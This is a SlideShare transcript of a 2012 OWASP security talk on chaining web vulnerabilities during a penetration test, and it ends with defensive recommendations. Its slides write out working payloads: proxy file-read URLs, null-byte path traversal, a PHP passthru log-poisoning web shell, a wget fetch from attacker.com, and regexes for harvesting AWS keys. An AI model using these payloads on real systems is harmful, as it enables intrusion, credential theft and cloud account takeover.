SlideShare a Scribd company logo

Attack Chaining: Advanced Maneuvers for Hack Fu

Rob Ragan, profile picture
Rob Ragan

The document outlines advanced attack chaining techniques for penetration testing, demonstrating a step-by-step process of exploiting vulnerabilities in web applications and cloud infrastructures. It emphasizes the risks associated with insecure configurations, exposure of sensitive information, and the potential consequences of such breaches, particularly on Amazon AWS services. Key strategies for prevention and improvement, including the implementation of defense-in-depth and strategic security policies, are also discussed.

TechnologyDesign
Related topics:
Information Security Penetration-TestingApplication Security
1 of 72
Downloaded 122 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL 31 May 2012
About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
Penetration Test vs. Vulnerability Assessment 3  
vs. 4  
Simulate a real world attack against a target network or application. - EVERYBODY 5  
It answers the question, “could someone break in?” 6  
Penetration Testing Exploit & Penetrate Information Gathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
Step 1 – Explore 9  
Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
Attack Chaining – Maneuver 1 13  
Attack Chaining – Maneuver 1 14  
Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17  
Step 7 – Back to DirBuster 18  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 20  
Attack Chaining – Maneuver 2 21  
Attack Chaining – Maneuver 2 22  
Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 24  
Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26  
Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
Step 12 – Poison Logs 28  
Step 12 – Poison Logs 29  
Step 12 – Poison Logs ? echo 'pre'; passthru($_GET['cmd']); echo '/pre'; ? 30  
Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo 'pre';passthru( $_GET['cmd']);echo 'pre'; ? 32  
Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
Step 14 – Execute Code ? echo 'pre'; passthru('ls'); echo '/pre'; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
Attack Chaining – Maneuver 3 35  
Attack Chaining – Maneuver 3 36  
Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php;   37  
Step 16 – Enjoy! 38  
Step 17 – I  want  more! ec2[^d]['][A-Z0-9]{20}['] ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] ec2.*['][A-Z0-9]{20}['] ec2(D)*['][A-Z0-9]{20}['] amazon.*['][A-Z0-9]{20}['] (amazon|ec2).*['][A-Z0-9]{20}['] amazon(D)*['][A-Z0-9]{20}['] access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40} amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}['] aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] secret.*['][A-Za-z0-9+/]{40}['] ['][A-Za-z0-9+/]{40}['].*amazon 39  
Step 18 – Amazon  AWS  Regex $this-­‐amazonService  =  new  Zend_Service_Amazon('DB3BAD768F2F11C7628',     $aws_key  =  '8AFB5AF55D1E6620EE1';     define('AMAZON_KEY',  '372B8E408D1484C538F');     if  (!defined('awsAccessKey'))  define('awsAccessKey',  '9F6EB7471C926194884');     //if  (!defined('awsAccessKey'))  define('awsAccessKey',  '4CAD89B86344CD8C26C');     define('AMAZON_AES_ACCESS_KEY_ID',  '95C95B8DC84AA24C0EC');   40  
Step 19 – AWS  Takeover 41  
Step 20 – Make  It  Your  Own 42  
Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters $1,049,000 43  
Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanently PRICELESS 44  
Attack Chaining – Hack Fu 45  
Attack Chaining – Hack Fu 46  
Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
Web à Mass Malware Deployment 48  
Web à Data Center Compromise 49  
Web à Internal Network Compromise 50  
Internal Assessmentà SSN Bank #’s 51  
Infrastructure Review 52  
Step 1 – Target Wireless 53  
Step 1 – Target Wireless 54  
Step 2 – Port Scan 55  
Step 3 – Test Default Creds 56  
Infrastructure Apocalypse 57  
Step 4 – Control AP 58  
Step 5 – Read All E-mail 59  
Step 6 – Listen To VOIP 60  
Step 7 – Open All Doors 61  
Step 7 – Open All Doors 62  
63  
Step 7 – Server Room Door 64  
Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
How Do You Get Better? 68  
Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
Attack Visualization LIKE BOBBY FISCHER 70  
Attack Chaining: Advanced Maneuvers for Hack Fu
Thank You 72  

More Related Content

PPT
Intro to Web Application Security
Rob Ragan
 
PPT
Filter Evasion: Houdini on the Wire
Rob Ragan
 
PPT
Static Analysis: The Art of Fighting without Fighting
Rob Ragan
 
PPT
Writing Secure Code – Threat Defense
amiable_indian
 
PPTX
SSRF For Bug Bounties
OWASP Nagpur
 
PDF
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
PPTX
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
PPTX
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Intro to Web Application Security
Rob Ragan
 
Filter Evasion: Houdini on the Wire
Rob Ragan
 
Static Analysis: The Art of Fighting without Fighting
Rob Ragan
 
Writing Secure Code – Threat Defense
amiable_indian
 
SSRF For Bug Bounties
OWASP Nagpur
 
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 

What's hot (20)

PDF
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
PDF
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
PPTX
MITM Attacks on HTTPS: Another Perspective
GreenD0g
 
PDF
Flashack
n|u - The Open Security Community
 
PDF
Web Security 101
Michael Peters
 
PDF
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
ODP
Top 10 Web Security Vulnerabilities
Carol McDonald
 
PPTX
Secure Programming In Php
Akash Mahajan
 
PPTX
Waf bypassing Techniques
Avinash Thapa
 
PDF
Hacking the Web
Mike Crabb
 
PDF
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
PDF
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 
PDF
In graph we trust: Microservices, GraphQL and security challenges
Mohammed A. Imran
 
PPS
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
ClubHack
 
PPTX
Application and Website Security -- Fundamental Edition
Daniel Owens
 
PDF
Romulus OWASP
Grupo Gesfor I+D+i
 
DOC
Same Origin Policy Weaknesses
kuza55
 
PPTX
OWASP Pune Chapter : Dive Into The Profound Web Attacks
Narendra Bhati
 
PDF
Shellcoding in linux
Ajin Abraham
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
MITM Attacks on HTTPS: Another Perspective
GreenD0g
 
Flashack
n|u - The Open Security Community
 
Web Security 101
Michael Peters
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Secure Programming In Php
Akash Mahajan
 
Waf bypassing Techniques
Avinash Thapa
 
Hacking the Web
Mike Crabb
 
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Внедрение безопасности в веб-приложениях в среде выполнения
Positive Hack Days
 
In graph we trust: Microservices, GraphQL and security challenges
Mohammed A. Imran
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
ClubHack
 
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Romulus OWASP
Grupo Gesfor I+D+i
 
Same Origin Policy Weaknesses
kuza55
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
Narendra Bhati
 
Shellcoding in linux
Ajin Abraham
 

Viewers also liked (8)

PDF
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
Rob Ragan
 
PDF
Social Engineering: the Bad, Better, and Best Incident Response Plans
Rob Ragan
 
PDF
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Bishop Fox
 
PDF
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Rob Ragan
 
PDF
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Rob Ragan
 
PDF
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
Rob Ragan
 
PDF
21 Hidden LinkedIn Hacks Revealed
Emma Brudner
 
PPT
Train The Trainer Power Point Presentation
preethi_madhan
 
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
Rob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Rob Ragan
 
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Bishop Fox
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Rob Ragan
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Rob Ragan
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
Rob Ragan
 
21 Hidden LinkedIn Hacks Revealed
Emma Brudner
 
Train The Trainer Power Point Presentation
preethi_madhan
 

Similar to Attack Chaining: Advanced Maneuvers for Hack Fu (20)

PDF
Penetration Testing is the Art of the Manipulation
JongWon Kim
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
PPT
Beyond Automated Testing - RVAsec 2016
Andrew McNicol
 
PDF
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
PDF
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
PPT
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
PPT
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
PDF
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Sandro Zaccarini
 
PDF
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
PDF
Hacking sites for fun and profit
David Stockton
 
PDF
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
Aditya K Sood
 
PPT
Andrew and Zac RVA-Beyond-Automated-Testing-2016.ppt
BUSHRASHAIKH804312
 
PDF
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
DOCX
Continuing in your role as a human service provider for your local.docx
richardnorman90310
 
PPTX
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
PPTX
Reversing Engineering a Web Application - For fun, behavior and detection
Rodrigo Montoro
 
PPT
BSidesDC 2016 Beyond Automated Testing
Andrew McNicol
 
PDF
Web hackingtools cf-summit2014
ColdFusionConference
 
PPTX
[FTP|SQL|Cache] Injections
David Barroso
 
PDF
Hacking sites for fun and profit
David Stockton
 
Penetration Testing is the Art of the Manipulation
JongWon Kim
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
Beyond Automated Testing - RVAsec 2016
Andrew McNicol
 
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Sandro Zaccarini
 
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
Hacking sites for fun and profit
David Stockton
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
Aditya K Sood
 
Andrew and Zac RVA-Beyond-Automated-Testing-2016.ppt
BUSHRASHAIKH804312
 
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
Continuing in your role as a human service provider for your local.docx
richardnorman90310
 
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
Reversing Engineering a Web Application - For fun, behavior and detection
Rodrigo Montoro
 
BSidesDC 2016 Beyond Automated Testing
Andrew McNicol
 
Web hackingtools cf-summit2014
ColdFusionConference
 
[FTP|SQL|Cache] Injections
David Barroso
 
Hacking sites for fun and profit
David Stockton
 

Recently uploaded (20)

PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PDF
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
PPTX
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
PDF
August Patch Tuesday
Ivanti
 
PPTX
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
bonakiduza1024
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
Encapsulation theory and applications.pdf
gurumoop
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
August Patch Tuesday
Ivanti
 
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
bonakiduza1024
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
A Presentation on Artificial Intelligence
memembruh336
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
Teaching material agriculture food technology
LiaRayya
 
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 

Attack Chaining: Advanced Maneuvers for Hack Fu

  • 1. Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL 31 May 2012
  • 2. About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
  • 3. Penetration Test vs. Vulnerability Assessment 3  
  • 4. vs. 4  
  • 5. Simulate a real world attack against a target network or application. - EVERYBODY 5  
  • 6. It answers the question, “could someone break in?” 6  
  • 7. Penetration Testing Exploit & Penetrate Information Gathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
  • 8. Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
  • 9. Step 1 – Explore 9  
  • 10. Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
  • 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
  • 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
  • 13. Attack Chaining – Maneuver 1 13  
  • 14. Attack Chaining – Maneuver 1 14  
  • 15. Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
  • 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
  • 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17  
  • 18. Step 7 – Back to DirBuster 18  
  • 19. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
  • 20. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 20  
  • 21. Attack Chaining – Maneuver 2 21  
  • 22. Attack Chaining – Maneuver 2 22  
  • 23. Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
  • 24. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 24  
  • 25. Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
  • 26. Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26  
  • 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
  • 28. Step 12 – Poison Logs 28  
  • 29. Step 12 – Poison Logs 29  
  • 30. Step 12 – Poison Logs ? echo 'pre'; passthru($_GET['cmd']); echo '/pre'; ? 30  
  • 31. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
  • 32. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo 'pre';passthru( $_GET['cmd']);echo 'pre'; ? 32  
  • 33. Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
  • 34. Step 14 – Execute Code ? echo 'pre'; passthru('ls'); echo '/pre'; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
  • 35. Attack Chaining – Maneuver 3 35  
  • 36. Attack Chaining – Maneuver 3 36  
  • 37. Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php;   37  
  • 38. Step 16 – Enjoy! 38  
  • 39. Step 17 – I  want  more! ec2[^d]['][A-Z0-9]{20}['] ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] ec2.*['][A-Z0-9]{20}['] ec2(D)*['][A-Z0-9]{20}['] amazon.*['][A-Z0-9]{20}['] (amazon|ec2).*['][A-Z0-9]{20}['] amazon(D)*['][A-Z0-9]{20}['] access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40} amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}['] aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] secret.*['][A-Za-z0-9+/]{40}['] ['][A-Za-z0-9+/]{40}['].*amazon 39  
  • 40. Step 18 – Amazon  AWS  Regex $this-­‐amazonService  =  new  Zend_Service_Amazon('DB3BAD768F2F11C7628',     $aws_key  =  '8AFB5AF55D1E6620EE1';     define('AMAZON_KEY',  '372B8E408D1484C538F');     if  (!defined('awsAccessKey'))  define('awsAccessKey',  '9F6EB7471C926194884');     //if  (!defined('awsAccessKey'))  define('awsAccessKey',  '4CAD89B86344CD8C26C');     define('AMAZON_AES_ACCESS_KEY_ID',  '95C95B8DC84AA24C0EC');   40  
  • 41. Step 19 – AWS  Takeover 41  
  • 42. Step 20 – Make  It  Your  Own 42  
  • 43. Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters $1,049,000 43  
  • 44. Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanently PRICELESS 44  
  • 45. Attack Chaining – Hack Fu 45  
  • 46. Attack Chaining – Hack Fu 46  
  • 47. Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
  • 48. Web à Mass Malware Deployment 48  
  • 49. Web à Data Center Compromise 49  
  • 50. Web à Internal Network Compromise 50  
  • 51. Internal Assessmentà SSN Bank #’s 51  
  • 53. Step 1 – Target Wireless 53  
  • 54. Step 1 – Target Wireless 54  
  • 55. Step 2 – Port Scan 55  
  • 56. Step 3 – Test Default Creds 56  
  • 58. Step 4 – Control AP 58  
  • 59. Step 5 – Read All E-mail 59  
  • 60. Step 6 – Listen To VOIP 60  
  • 61. Step 7 – Open All Doors 61  
  • 62. Step 7 – Open All Doors 62  
  • 63. 63  
  • 64. Step 7 – Server Room Door 64  
  • 65. Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
  • 66. Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
  • 67. Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
  • 68. How Do You Get Better? 68  
  • 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
  • 70. Attack Visualization LIKE BOBBY FISCHER 70  
  • 72. Thank You 72